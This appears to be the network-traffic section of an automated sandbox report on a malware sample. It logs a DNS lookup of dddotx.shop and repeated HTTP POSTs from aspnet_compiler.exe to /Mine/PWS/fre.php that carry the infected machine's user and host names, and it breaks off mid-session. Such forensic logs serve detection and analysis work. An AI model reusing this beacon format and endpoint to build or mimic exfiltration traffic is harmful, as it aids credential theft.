              Sep 25, 2024 10:21:01.509449005 CEST8049831188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:01.509562969 CEST4983180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:01.514352083 CEST8049831188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:02.141016006 CEST8049831188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:02.141156912 CEST4983180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:02.142018080 CEST8049831188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:02.142083883 CEST4983180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:02.145946026 CEST8049831188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:02.517767906 CEST4983280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:02.522639990 CEST8049832188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:02.522722006 CEST4983280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:02.525079012 CEST4983280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:02.529886961 CEST8049832188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:02.530014992 CEST4983280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:02.534825087 CEST8049832188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:03.199822903 CEST8049832188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:03.199949980 CEST4983280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:03.201128960 CEST8049832188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:03.201186895 CEST4983280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:03.204694986 CEST8049832188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:03.358948946 CEST4983380192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:03.363821983 CEST8049833188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:03.363928080 CEST4983380192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:03.366055012 CEST4983380192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:03.370846033 CEST8049833188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:03.370904922 CEST4983380192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:03.375658035 CEST8049833188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:04.014822960 CEST8049833188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:04.015053034 CEST4983380192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:04.015111923 CEST8049833188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:04.015185118 CEST4983380192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:04.019902945 CEST8049833188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:04.158212900 CEST4983480192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:04.486525059 CEST8049834188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:04.486735106 CEST4983480192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:04.488882065 CEST4983480192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:04.493710041 CEST8049834188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:04.493818045 CEST4983480192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:04.498579025 CEST8049834188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.131498098 CEST8049834188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.131735086 CEST4983480192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:05.132730007 CEST8049834188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.132921934 CEST4983480192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:05.136584997 CEST8049834188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.260602951 CEST4983580192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:05.265492916 CEST8049835188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.265657902 CEST4983580192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:05.268106937 CEST4983580192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:05.272849083 CEST8049835188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.272945881 CEST4983580192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:05.277735949 CEST8049835188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.949707985 CEST8049835188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.949911118 CEST4983580192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:05.950782061 CEST8049835188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:05.950833082 CEST4983580192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:05.954766989 CEST8049835188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.088898897 CEST4983680192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.093730927 CEST8049836188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.094008923 CEST4983680192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.096287012 CEST4983680192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.101110935 CEST8049836188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.101213932 CEST4983680192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.106209040 CEST8049836188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.745244026 CEST8049836188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.745366096 CEST8049836188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.745448112 CEST4983680192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.747261047 CEST4983680192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.752043009 CEST8049836188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.886004925 CEST4983780192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.892391920 CEST8049837188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.892486095 CEST4983780192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.894697905 CEST4983780192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.901330948 CEST8049837188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:06.901424885 CEST4983780192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:06.906593084 CEST8049837188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:07.563296080 CEST8049837188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:07.563865900 CEST8049837188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:07.563957930 CEST4983780192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:07.592628956 CEST4983780192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:07.597502947 CEST8049837188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:07.838444948 CEST4983880192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:07.843365908 CEST8049838188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:07.843883038 CEST4983880192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:07.851252079 CEST4983880192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:07.856080055 CEST8049838188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:07.859251022 CEST4983880192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:07.864099979 CEST8049838188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:08.545244932 CEST8049838188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:08.545522928 CEST4983880192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:08.545792103 CEST8049838188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:08.545870066 CEST4983880192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:08.550359964 CEST8049838188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:08.680654049 CEST4983980192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:09.688775063 CEST4983980192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:09.933722019 CEST8049839188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:09.933737040 CEST8049839188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:09.933913946 CEST4983980192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:09.936089039 CEST4983980192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:09.940920115 CEST8049839188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:09.943417072 CEST4983980192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:09.948189020 CEST8049839188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:10.666544914 CEST8049839188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:10.666794062 CEST8049839188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:10.666965008 CEST4983980192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:10.670634985 CEST4983980192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:10.675339937 CEST8049839188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:10.805988073 CEST4984080192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:10.810821056 CEST8049840188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:10.810976028 CEST4984080192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:10.813240051 CEST4984080192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:10.817974091 CEST8049840188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:10.818080902 CEST4984080192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:10.822830915 CEST8049840188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:11.512902975 CEST8049840188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:11.513057947 CEST4984080192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:11.513513088 CEST8049840188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:11.513587952 CEST4984080192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:11.517815113 CEST8049840188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:11.658046961 CEST4984180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:11.663784027 CEST8049841188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:11.663985014 CEST4984180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:11.669521093 CEST4984180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:11.674395084 CEST8049841188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:11.674439907 CEST4984180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:11.679291964 CEST8049841188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:12.356112957 CEST8049841188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:12.356324911 CEST4984180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:12.356396914 CEST8049841188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:12.356451988 CEST4984180192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:12.361140966 CEST8049841188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:12.559189081 CEST4984280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:12.564131021 CEST8049842188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:12.564218998 CEST4984280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:12.566299915 CEST4984280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:12.571078062 CEST8049842188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:12.571147919 CEST4984280192.168.2.7188.114.97.3
              Sep 25, 2024 10:21:12.575938940 CEST8049842188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:13.248045921 CEST8049842188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:13.248256922 CEST8049842188.114.97.3192.168.2.7
              Sep 25, 2024 10:21:13.248307943 CEST4984280192.168.2.7188.114.97.3
              TimestampSource PortDest PortSource IPDest IP
              Sep 25, 2024 10:19:08.181261063 CEST5252353192.168.2.71.1.1.1
              Sep 25, 2024 10:19:08.194547892 CEST53525231.1.1.1192.168.2.7
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Sep 25, 2024 10:19:08.181261063 CEST192.168.2.71.1.1.10x7b8dStandard query (0)dddotx.shopA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Sep 25, 2024 10:19:08.194547892 CEST1.1.1.1192.168.2.70x7b8dNo error (0)dddotx.shop188.114.97.3A (IP address)IN (0x0001)false
              Sep 25, 2024 10:19:08.194547892 CEST1.1.1.1192.168.2.70x7b8dNo error (0)dddotx.shop188.114.96.3A (IP address)IN (0x0001)false
              • dddotx.shop
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.749699188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:08.206741095 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 192
              Connection: close
              Sep 25, 2024 10:19:08.211637974 CEST192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: 'ckav.rufrontdesk651689FRONTDESK-PCk0FDD42EE188E931437F4FBE2CvlQ9l
              Sep 25, 2024 10:19:09.125356913 CEST561INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:08 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9t8yz2U2irZoq6Uw3dUjkj78ZEXgG8MnmB9xALizVpWkR%2Fm9vqAsd%2FGudhHg2amd1h76Hv%2FFQ3maCR8loEfHWWrsPf2IzBdgKhiO1TM8W2S4SmEKHdvu4rhyEu%2BxBA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89966aded28ce8-EWR
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.749700188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:09.257600069 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 192
              Connection: close
              Sep 25, 2024 10:19:09.263458014 CEST192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: 'ckav.rufrontdesk651689FRONTDESK-PC+0FDD42EE188E931437F4FBE2CFtHKQ
              Sep 25, 2024 10:19:09.982157946 CEST591INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:09 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B2H2c0Gj2uWvet4ViqNJLX2Yk7vZoWpp7RzdBTI8kZBYwxHhoRCOudl3VT3vT0IFa8M5zwG07SPzAGiDhFJbHQVp%2BXVJFYW2UtP2E5aTuCCA2OJPUz%2BiNx1gjG%2Bzcw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89967168f01a0f-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.749701188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:10.058101892 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:10.062927008 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:10.811630011 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:10 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2OvSeZZQTmhd75P2XTmwZYodU%2Bl68iqvjz7NIeIFz1rA76YgN73SvxxXjb1%2B15DmR1rjbTH9rRfbWNKCSPsrPjr5uUQWgjwaan7Mn11nDQzivaZQUC8W95fghiLug%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996767a458cb4-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.749702188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:10.964413881 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:10.969314098 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:11.665431976 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:11 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlhK6sP%2FjGiccxN5WqbMJ7FBrFLcskipZJsHQypob8lx8mwY94fXCU0%2Bzg0m9JyL9WInxHL8HL%2FIcG6YpXj5nDlfdi0TvjpZNJA7v6GW53X%2BhJzRWdkQC9AOWKDkTA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89967c1fbe43d9-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.749703188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:11.832576036 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:11.837774038 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:12.530971050 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:12 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boOSk5iX75iAUOyBOaaWNADScZnIR3oD4BhEaYPKDT5WwvpMQuGiaECNRY4r049k18b7jnIy6akaSEC1DxCWQmvfEQKE%2B9hkM7hsww5HvAYbPxF1gQh%2F08Q3%2BgfIYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899681aa685e5f-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.749704188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:12.683944941 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:12.688863993 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:13.452939987 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:13 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trQiPC%2BfoJTo3Hf42NuVPNFZ2GNtT6TX6AIXzO021oL5tY3Lf1N3vmKdctmyeuZwnHk0m01wwaI%2FPbVTgXCWYj1JqC0dng4snsXkckUT43xMH2igMHAtVqi3e%2Fcl%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899686cb0f1791-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.749705188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:13.608577967 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:13.615421057 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:14.450290918 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:14 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cmhbUqd%2FywIijoA3eanxHATHUbXNJ5Ze3GMIvAixoBoM3qA%2FHlrXuFWPOiq6MDSiSQwGGUas%2F8TRYTlfGNnbjpxK7KouFFFSiw1Aogsf4jiBKeYZ%2F8SSZxv%2FD9hUg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89968c8eb90cc2-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.749706188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:14.706671953 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:14.711569071 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:15.399228096 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:15 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hjf7%2FbhQDeW6ZKrU5IhE4S3b8rSFr22eXuOErInXDBXVF1vNV3S859ZlrN6LeNF%2BShs5Eniv5%2BkKTQf7iV7T0BZNSBzuFeZY8fAgQrKEfwgSj%2BN3zXz7lwR%2FztHs9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89969389c70f5b-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.749707188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:15.576531887 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:15.581402063 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:16.220118999 CEST603INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:16 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
